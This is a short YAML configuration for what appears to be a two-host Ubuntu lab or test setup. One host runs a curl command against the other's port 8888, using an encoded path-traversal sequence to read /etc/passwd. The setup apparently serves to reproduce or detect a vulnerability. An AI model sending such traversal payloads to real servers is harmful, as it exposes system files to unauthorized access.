blueprint: ubuntu2204-ubuntu2204
ports: 8888
ubuntu1:
  playbook: ubuntu1.yml
ubuntu2:
  playbook: ubuntu2.yml
  trace: "curl"
  command:
    - "curl -v \"http://%ubuntu1%:8888/1/1/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29etc/passwd\""
